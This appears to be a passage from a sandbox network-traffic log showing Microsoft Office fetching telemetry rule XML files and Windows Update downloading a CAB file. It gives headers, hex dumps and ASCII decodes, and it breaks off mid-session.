                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:31 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:31 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 427
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                      x-ms-request-id: 7875ffac-201e-000c-7f02-1779c4000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185131Z-1657d5bbd482lxwq1dp2t1zwkc0000000500000000014cgu
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      71192.168.2.74978013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:31 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:31 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:31 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 475
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                      x-ms-request-id: 01bf113a-f01e-003c-3703-178cf0000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185131Z-1657d5bbd487nf59mzf5b3gk8n000000050g00000000fbzu
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:31 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      72192.168.2.7497764.175.87.197443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:31 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                      Host: slscr.update.microsoft.com
                                                                                                      2024-10-08 18:51:32 UTC560INHTTP/1.1 200 OK
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Expires: -1
                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                      MS-CorrelationId: 695f1e2d-6c2a-4754-b96f-adebe32e3330
                                                                                                      MS-RequestId: de441188-5cb6-449e-a53d-9d26ba424a4b
                                                                                                      MS-CV: S/g8cZziLUCYejr5.0
                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Date: Tue, 08 Oct 2024 18:51:31 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 24490
                                                                                                      2024-10-08 18:51:32 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                      2024-10-08 18:51:32 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      73192.168.2.74978313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:32 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:32 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:32 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 474
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                      x-ms-request-id: 3b7b7106-501e-0064-43e7-161f54000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185132Z-1657d5bbd48jwrqbupe3ktsx9w00000005ng000000007xq4
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:32 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      74192.168.2.74978613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:32 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:32 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:32 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 405
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                      x-ms-request-id: dfb96d6a-f01e-003f-17e5-16d19d000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185132Z-1657d5bbd482lxwq1dp2t1zwkc0000000570000000002vwr
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:32 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      75192.168.2.74978513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:32 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:32 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:32 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 472
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                      x-ms-request-id: 2f576d96-401e-0047-3902-178597000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185132Z-1657d5bbd482krtfgrg72dfbtn000000056g000000004h3w
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      76192.168.2.74978413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:32 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:32 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:32 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 419
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                      x-ms-request-id: f196d52c-b01e-0002-1604-171b8f000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185132Z-1657d5bbd48xlwdx82gahegw4000000005m000000000ekae
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      77192.168.2.74978913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:33 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:33 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:33 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 468
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                      x-ms-request-id: f5ee0945-901e-0083-4202-17bb55000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185133Z-1657d5bbd48762wn1qw4s5sd30000000058000000000g6ku
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      78192.168.2.74979013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:33 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:33 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:33 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 174
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                      x-ms-request-id: 921a37cb-d01e-0049-784d-19e7dc000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185133Z-1657d5bbd48xjgsr3pyv9u71rc000000017g000000013ad2
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:33 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      79192.168.2.74979113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:33 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:33 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:33 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1952
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                      x-ms-request-id: a5ff6bd9-301e-005d-3af2-16e448000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185133Z-1657d5bbd48762wn1qw4s5sd30000000053g0000000169hb
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:33 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      80192.168.2.74979313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:33 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:33 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:33 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 501
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
